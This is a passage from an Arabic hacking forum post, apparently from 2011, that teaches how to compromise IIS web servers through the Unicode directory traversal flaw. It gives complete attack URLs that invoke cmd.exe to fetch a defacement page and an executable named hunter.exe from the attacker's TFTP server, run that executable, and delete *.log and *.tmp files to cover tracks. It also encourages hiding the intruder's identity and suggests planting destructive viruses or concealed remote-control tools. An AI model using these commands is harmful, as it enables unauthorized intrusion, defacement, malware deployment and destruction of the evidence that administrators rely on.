tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroo t\index.htm
ياللروعه لقد تجاوزنا العقبه بالفعل
الان قم بتشغيل سيرفر الـ TFTP وقم بتجهيز ملف الـ index.htm
وقم بالاتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو :
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroo t\index.htm
وهكذا قمنا بتحميل الصفحة الى الانترنت وانتيهنا من عملية الاختراق (( تقريبا ))
ملحوظه : يمكنك ان تقوم بتحميل ملفات EXE ايضا وتشغيلها على السيرفر بنفس الاسلوب وهذا مثال :
لنفرض اننا نريد تحميل ملف EXE على السيرفر وسميناه hunter.exe ونريد تشغيله فكيف لنا ذلك ؟
سنتبع الاتي :
نقوم بتحميل الملف على السيرفر كما قمنا بتحميل index.htm ونضعه في \:C للسيرفر عبر هذه التوليفه :
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe
بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا الامر
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe
او عن طريق هذا الامر
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
الآن وقد قاربنا على الانتهاء بقي لدينا في السيرفر عمل واحد فقط الا وهو مسح ملفات اللوج log.* وسيكون ذلك عن طريق هذا الامر :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s
هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات الامتداد tmp
وهذا امر مسحها عبر اليونيكود :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s
ايضا ملحوظه مهمه وهي ان لا تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او ايميلاتهم الحقيقيه قم بمسح اي شيء يدل عليك
او على عملية الاختراق (( حاول ان تصل الى هذا المستوى ))
هناك عدد من الاشياء والافكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف bat حتى تتمكن من وضع مشكله كبيره في السيرفر لكي لا يعمل
او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج التحكم عن بعد و اخفائها بشكل جيد
في المجلدات ذات الملفات الكثير (( مثل system32 )) والكثير الكثير
__________________________________________________ ______________________________
ملحوظات : لن تعمل هذه الثغره في كل الحالات فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن طريق مسح ملف tftp من سيرفراتهم
(( الملف المسؤول عن ذلك موجود في المجلد system32 )) وبعض السيرفرات قامت بعملية الترقيع (( اصدرت ميكروسوفت ترقيعا لهذه الثغره ))
وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه العمليات
واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم IIS الا وهو Secure IIS من شركة Eeye
والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع (( قبل حوالي اربعة اشهر )) كان ما يقارب 90% من السيرفرات التي فيها نظام IIS
تحوي هذه الثغره وبدون ترقيع (( لعدم وجوده وقتها )) او لأهمال المدير.
انتهى،،،
بالتوفيق
الخميس 10 فبراير 2011, 6:53 am من طرف 
